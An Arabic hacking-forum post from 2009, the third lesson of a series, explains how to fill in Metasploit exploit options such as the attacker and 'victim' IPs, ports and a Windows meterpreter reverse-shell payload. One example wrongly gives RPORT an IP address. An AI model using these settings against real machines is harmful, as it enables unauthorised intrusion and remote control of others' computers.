عرض مشاركة واحدة
قديم 09-19-2009, 03:57 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي [الدرس الثالث]ادخال معلومات الهدف الى خيارات الثغرة(مهم)


بسم الله الرحم الرحيم
السلام عليكم ورحمة الله وبركاتة

اليوم درسنا الدرس الثالث ان شاء الله رح يكون عن ادخال معلومات الهدف في خيارات الثغرة لأستغلالها بالشكل الصحيح
نبدأ على طول على بركة الله .. للعلم هذا الدرس اساسي في اعتمادك على الاختراق وهو يعتمد في عملية الاستهداف على 99% اذا لم يكن 100%
اول امر وهو

كود PHP:
set 
تطرقنا له في الدرس الثاني .. لأظهار خيارات الثغرة show options وهذا الامر موضح بالدرس السابق ..وبهذا الامر تستطيع معرفة ماذا ستستعملانظر تحت v_v
نشوف الآن كيف يكون الامر
كود PHP:
set LHOST 192.168.1.151 
يستخدم لادخال اي بي جهازنا ضمن خيارات الثغرة لتصنت عن طريقة او وصول تبليغ

كود PHP:
set RHOST 192.168.5.110 
يستخدم هذا ايضا لادخال اي بي جهاز الضحية يعني باختصار ي بي الهدف

كود PHP:
set LPORT 4444 
ادخال البورت الذي ستستخدمه في التصنت ولك الحق بوضع اي رقم بورت تريده وهذا يستخجم في حال انت تستخدم بايلود اتصال عكسي او ثغرة اتصال عكسي reverse
كود PHP:
set RPORT 192.168.5.151 
لأدخال بورت الهدف بتاع الضحية الى خيارات الثغرة ويستخدم هذا في حال الاتصال المباشر bind
###
كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp 
يستخدم لتحديد البايلود الذي نريد استخدامه في عملية الاختراق وان شاء الله رح يكون درس كامل عن هذه البايلود لخطورتها وسهولة استعمالها وقوتها

كود PHP:
set PATH /vb
هنا لتحديد المسار انا وضعت vb لمثال وانما في بعض تطلب مسارات اخرى لكن اللي يهمني هو الدال عليه وهو PATH وهو المسار المراد استخدام بشكل عام بأي ثغرة سواء كان تحديد مسار سكربت او تحديد ملف لأستعماله في الاختراق سواء سيرفر او غيره
كود PHP:
set VHOST host.com 
هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار

كود PHP:
set SRVPORT 80 
يستخدم لأدخال البورت في حال استخدام احد ثغرات المتصفح .. وهذا الخيار لا ياتي الا في ثغرات المتصفح browser هذا على حسب استعمالي اني لم اجدها في اي ثغرات اخرى غير ثغرات المتصفح وفي هذه الحالة فيك تضع 80 او 8080 او اي بورت غيره
ويلزم يكون البورت الذي تريد وضعه يكون مفتوح عندك ويفضل وضع 80 لانه للمتصف http وانت الان تتصفح انظر فوق اول رابط الموقع مكتوب http وهو بورت 80 اذا اكيد يكون مفتوح تلقائي يعني ما بتشوفه مفتوح بالرواتر هذا على حسب استنباطي
كود PHP:
set SRVHOST 0.0.0.0 
يسخدم ايضا هذا الخيار فقط تلقاه في ثغرات المتصفح هذا تضع به الاي بي جهازك.. واذا تركته مثل ما هو SRVHOST 0.0.0.0 رح يتم الاستغلال تلقائي يعني وضع اي بي جهازك تلقائي فيفضل ان لا تعدل عليه لانه رح يتم تلقائي وضع اي بي جهازك يعني رح تشوفه في خيارات الثغرة هكذا 0.0.0.0

كود PHP:
set URIPATH arhacker.html 
يستخدم هذا الامر لوضع رابط وايضا هذا يستخدم في ثغرات المتصفح يعني يمكن ما تلاقيه بثغرات اخرى << لست متذكر اني لم اجده في ثغرات اخرى

الى هنا ينتهي الدرس بحمد الله
اي استفسار ضعه هنا وان شاء الله يتم الرد واذا لم اكن موجود فألاعضاء ما يقصرون معك بأذن الله
ان شاء الله الدرس الرابع رح اتطرق لانواع البايلود واهميتها ووظيفتها
####
تحياتي
لا للاحتكار
المجهوول


Fhg]vs hgehgeDh]ohg lug,lhj hgi]t hgn odhvhj hgeyvm(lil)

   

رد مع اقتباس